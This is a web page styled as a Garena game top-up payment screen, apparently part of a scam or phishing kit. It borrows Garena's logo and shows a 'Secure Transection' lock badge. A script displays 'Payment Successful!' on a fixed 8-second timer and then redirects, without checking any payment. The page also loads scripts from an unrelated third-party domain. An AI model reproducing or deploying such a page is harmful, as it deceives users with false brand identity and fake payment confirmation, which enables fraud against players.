<!DOCTYPE HTML>
<html lang="en">

<head>
<meta http-equiv="Refresh" content="10;url=en-payment-success.html">
 <meta property="og:image" content="ls-logo.jpg" />
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, viewport-fit=cover" />
  <title>LEAK STUDIO TOP UP CENTER</title>
  
     <link href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,500,500i,700,700i,900,900i%7CSource+Sans+Pro:300,300i,400,400i,600,600i,700,700i,900,900i" rel="stylesheet">
  <link rel="stylesheet" type="text/css" href="https://www.clashofmagic.cc/styles/style.css">
  <link rel="stylesheet" type="text/css" href="framework.css">
  <link rel="stylesheet" type="text/css" href="https://www.clashofmagic.cc/fonts/css/fontawesome-all.min.css">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
  <link rel="stylesheet" href="style2.css">
  
 
 
 <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
 <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
 <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
 
 
 
 <script type="text/javascript" src="http://code.jquery.com/jquery-1.8.2.js"></script>
    <script type='text/javascript'>
        $(function () {
            var overlay = $('<div id="overlay"></div>');
            overlay.show();
            overlay.appendTo(document.body);
            $('.popup').show();
            $('.close').click(function () {
                $('.popup').hide();
                overlay.appendTo(document.body).remove();
                return false;
            });
 
            $('.x').click(function () {
                $('.popup').hide();
                overlay.appendTo(document.body).remove();
                return false;
            });
        });
    </script>
    <style>
    /* Center the loader */
    #loader {
    position: absolute;
    left: 50%;
    top: 50%;
    z-index: 1;
    width: 120px;
    height: 120px;
    margin: -76px 0 0 -76px;
    border: 16px solid #f3f3f3;
    border-radius: 50%;
    border-top: 16px solid #3498db;
    -webkit-animation: spin 2s linear infinite;
    animation: spin 2s linear infinite;
    }
    
    @-webkit-keyframes spin {
    0% { -webkit-transform: rotate(0deg); }
    100% { -webkit-transform: rotate(360deg); }
    }
    
    @keyframes spin {
    0% { transform: rotate(0deg); }
    100% { transform: rotate(360deg); }
    }
    
    /* Add animation to "page content" */
    .animate-bottom {
    position: relative;
    -webkit-animation-name: animatebottom;
    -webkit-animation-duration: 1s;
    animation-name: animatebottom;
    animation-duration: 1s
    }
    
    @-webkit-keyframes animatebottom {
    from { bottom:-100px; opacity:0 } 
    to { bottom:0px; opacity:1 }
    }
    
    @keyframes animatebottom { 
    from{ bottom:-100px; opacity:0 } 
    to{ bottom:0; opacity:1 }
    }
    
    #myDiv {
    display: none;
    text-align: center;
    }
    </style>
 
</head>

<body onload="myFunction()"  class="theme-light" data-background="none" data-highlight="red1">

  <div>
  
  

  
  <table border="0">
  <tr>
  
  <td>
  <button style="background-color:white;padding:5px 5px;color:#fff;border-radius:5px;text-decoration:none;" type="submit">
  
  </button>
  </td>
  
  
  <td>
  <img src="https://cdn.freelogovectors.net/wp-content/uploads/2019/01/garena-logo.png" height="30" width="85">
  
  </td>
  
  <td>
  <button style="background-color:white;padding:10px 20px;color:#fff;border-radius:5px;text-decoration:none;" type="submit">
  <p align="left"> <font color="white">
  Secure Transection
  </font></p></button>
  </td>
  
  <td>
  <button style="background-color:white;padding: 6px 6px;color:#fff;border-radius:5px;text-decoration:none;" type="submit">
  <font color="black">
  <i class="fa fa-lock"></i>
  </font></button>
  </td>
  
  <td>
  <button style="background-color:white;padding: 5px 5px;color:#fff;border-radius:5px;text-decoration:none;" type="submit">
  </button>
  </td>
  </tr>
  </table>
  
  
  
  
 
 
 
 <br><br><br><br>

 <br><br><br><br><br><br><br>


 <br><br>
 <font color="grey">
<center>


</font>
<font color="green">
<br><br>
This page will update once your payment has been confirmed. 
</font>
</center>



 <div id="loader"></div>
 
 <div style="display:none;" id="myDiv" class="animate-bottom">

 
 <h2></h2>
 <p>Payment Successful!
 
 <br><br>
 
 Redirecting to confirmation page...
 
 </p>
 
 
 
 
 </div>
 
 <script>
 var myVar;
 
 function myFunction() {
 myVar = setTimeout(showPage, 8000);
 }
 
 function showPage() {
 document.getElementById("loader").style.display = "none";
 document.getElementById("myDiv").style.display = "block";
 }
 </script>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
     

    </div>
    <!--Menu Settings-->
    <div style="display:none">
      <div class="toggle-with-icon">
        <i class="toggle-icon round-tiny fa fa-moon bg-red2-dark color-white"></i>
        <a href="#" class="toggle-switch toggle-ios toggle-off" data-toggle-theme data-toggle-height="27" data-toggle-width="50" data-toggle-content="toggle-content-1" data-toggle-checkbox="toggle-checkbox-1" data-bg-on="bg-green1-dark" data-bg-off="">
        </a>
      </div>
    </div>

    <div class="menu-hider"></div>
  </div>






   
  <script src="https://www.clashofmagic.cc/scripts/jquery.js"></script>
  <script src="https://www.clashofmagic.cc/scripts/plugins.js"></script>
  <script src="https://www.clashofmagic.cc/scripts/custom.js"></script>
</body>
